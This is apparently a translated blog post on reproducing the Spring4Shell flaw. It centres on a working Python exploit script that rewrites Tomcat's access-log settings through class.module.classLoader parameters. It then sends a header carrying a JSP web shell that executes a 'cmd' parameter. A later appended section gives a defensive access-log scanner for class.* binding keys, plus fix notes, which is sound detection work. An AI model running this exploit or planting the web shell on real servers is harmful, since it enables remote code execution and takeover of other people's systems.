
Background

After this hole leaked on the 29th, I basically slacked off and didn't do much hands-on with it.
I only got the environment on the 31st, and then reproduced it by following the article the author wrote.

  1. Setting up a simple Spring project in IDEA; the pitfalls were a few missing dependency packages, and that JDK 17 doesn't support the vulnerability.
  2. Principle: bean object generation exposes a cached class object; using that as the pivot, a logging call chain is constructed to achieve RCE.
  3. exp (exploit script)
    import requests

    # Request 1: each query parameter binds through class.module.classLoader into
    # Tomcat's access-log valve settings (pattern, suffix, directory, prefix, date format).
    test = ["class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bfuck%7Di",
            "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp",
            "class.module.classLoader.resources.context.parent.pipeline.first.directory=/Users/yunoon/Downloads/spring"
            "-rce-war-fa55cb4b11516784574d06948d53ac90f8430f50/out/artifacts/stupidRumor_war_exploded",
            "class.module.classLoader.resources.context.parent.pipeline.first.prefix=fuckJsp",
            "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="]

    url2 = "http://localhost:8084/stupidRumor_war_exploded/index?"
    for i in range(5):
        url2 = url2 + "&" + test[i]
    print(url2)
    res = requests.get(url=url2)
    print(res.status_code)

    # Request 2: the value of the 'fuck' header is what the %{fuck}i log pattern
    # writes into the file; the remaining headers just make it look like a normal browser request.
    header = {
        'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 "
                      "Safari/537.36",
        'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        'fuck': '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>',
        'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        'Accept-Encoding': "gzip, deflate",
        'Connection': "close",
        'Upgrade-Insecure-Requests': "1",
        'Sec-Fetch-Dest': "document",
        'Sec-Fetch-Mode': "navigate",
        'Sec-Fetch-Site': "none",
        'Sec-Fetch-User': "?1",
    }
    url1 = "http://localhost:8084/stupidRumor_war_exploded/fuckUUUU"
    res = requests.get(url=url1, headers=header)
    print(res.status_code)
    
  4. I'll analyze the principle later when I have time, gugugu.
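A defender-side counterpart to the reproduction above, added here as an example and not part of the original post: a small scanner that walks access-log lines and flags requests whose query keys bind through the `class.` property path, which is exactly how the exp reaches the Tomcat log valve. It assumes a Tomcat/nginx-style log line with the request line in double quotes, and the sample lines are constructed, not real traffic.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Access-log request line, e.g. "GET /index?a=b HTTP/1.1" (Tomcat/nginx style).
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')


def class_binding_keys(target):
    """Return query keys that try to bind through the `class.` property path.

    The script above uses class.module.classLoader.resources.context.parent.
    pipeline.first.*; flagging every `class.`-prefixed key also covers variants.
    """
    if "?" not in target:
        return []
    hits = []
    for key, _value in parse_qsl(target.split("?", 1)[1], keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded keys.
        key = unquote_plus(key).lower()
        if key.startswith("class."):
            hits.append(key)
    return hits


def scan_access_log(lines):
    """Return [(line_no, keys)] for requests that bind into class.*."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        if match:
            keys = class_binding_keys(match.group("target"))
            if keys:
                findings.append((line_no, keys))
    return findings


# Constructed sample lines (not real traffic): a benign request, the binding
# request from the script above, and the follow-up hit on fuckUUUU, whose
# payload travels in a header and so is invisible to this query-only check.
SAMPLE_LOG = [
    '127.0.0.1 - - [31/Mar/2022:10:00:00 +0800] "GET /app/index?name=a HTTP/1.1" 200 12',
    '127.0.0.1 - - [31/Mar/2022:10:00:01 +0800] "GET /app/index?&class.module.classLoader'
    '.resources.context.parent.pipeline.first.pattern=%25%7Bfuck%7Di&class.module.classLoader'
    '.resources.context.parent.pipeline.first.suffix=.jsp HTTP/1.1" 200 12',
    '127.0.0.1 - - [31/Mar/2022:10:00:02 +0800] "GET /app/fuckUUUU HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for line_no, keys in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: {len(keys)} class.* binding key(s), e.g. {keys[0]}")
```

The second stage (the header carrying the JSP payload) does not show up in the query string, so header logging or a WAF rule is needed to see that part; the fix on the application side is to keep Spring from binding `class.*` at all.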